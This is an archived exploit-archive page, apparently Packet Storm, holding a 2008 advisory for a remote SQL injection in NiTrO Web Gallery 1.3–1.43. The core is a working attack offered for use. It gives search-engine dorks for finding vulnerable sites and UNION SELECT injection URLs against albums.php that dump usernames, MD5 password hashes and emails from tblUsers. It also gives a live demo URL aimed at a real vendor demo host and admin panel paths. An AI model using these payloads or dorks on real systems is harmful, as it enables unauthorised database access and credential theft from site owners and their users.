exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

nitrowebgal-sql.txt

nitrowebgal-sql.txt
Posted Jun 16, 2008
Authored by Mr.SQL | Site pal-hacker.com

NiTrO Web Gallery versions 1.4.3 and below suffer from a remote SQL injection vulnerability.

tags | exploit, remote, web, sql injection
SHA-256 | cff0e8948a2f8513ac04035c5147d5a8d84180227b4d0cb1a7cf4ef2faf3bb79

nitrowebgal-sql.txt

Change Mirror Download
#########################################################################
#################### Viva IslaM Viva IslaM ##############################
##
## Remote SQL Injection Vulnerability
##
## NiTrO Web Gallery V1.3 - V1.4- V1.41 - 1.42 - V1.43 ( albums.php section )
##
#########################################################################
#########################################################################
##
## AuTh0r : Mr.SQL
##
## H0ME : WwW.PaL-HaCkEr.CoM
##
## Email : SQL@Hotmail.it
##
## !! SYRIAN HaCkErS !!
########################
########################
##
## Script : NiTrO Web Gallery
##
## Versions : V1.3 - V1.4- V1.41 - V1.42 - V1.43
##
## Site : www.nitropowered.net <<>> Download The Script : http://www.nitropowered.net/downloads/
##
########################
########################
##
## D0rk 1 : allinurl: "albums.php" section cats action show CatId
##
## D0rk 2 : "(C) This site is NITROpowered!"
##
## -(:: SQL ::)-
##
## www.site.com/
## albums.php?section=cats&action=show&CatId=-1+union+select+1,concat_ws(0x3a3a,UserName,UserPassword,UserEmail),3,4,5,6,7,8+from+tblUsers/*
## 0r
## albums.php?section=cats&action=show&CatId=-1+union+select+1,concat_ws(0x3a3a,UserName,UserPassword,UserEmail),3,4,5,6,7,8,9+from+tblUsers/*
##
## -(:: L!VE DEMO ::)-
##
## http://demo.nitropowered.de/albums.php?section=cats&action=show&CatId=-1+union+select+1,concat_ws(0x3a3a,UserName,UserPassword,UserEmail),3,4,5,6,7,8,9+from+tblUsers/*
##
########################
########################
## -(:: Admin Panel ::)-
##
## www.site.com/?admin=1
## www.site.com/admin/
###################
###################

-(:: N0Te ::)-
tblUsers maybe this not admin table // (( Passwords => MD5 )) ;)

######################################################################################################
######################################################################################################

-(:: !Gr3E3E3E3E3E3E3TzZ! ::)-

:: HaCkEr-EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs ::

######################################################################################################
Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    27 Files
  • 28
    Sep 28th
    8 Files
  • 29
    Sep 29th
    14 Files
  • 30
    Sep 30th
    19 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close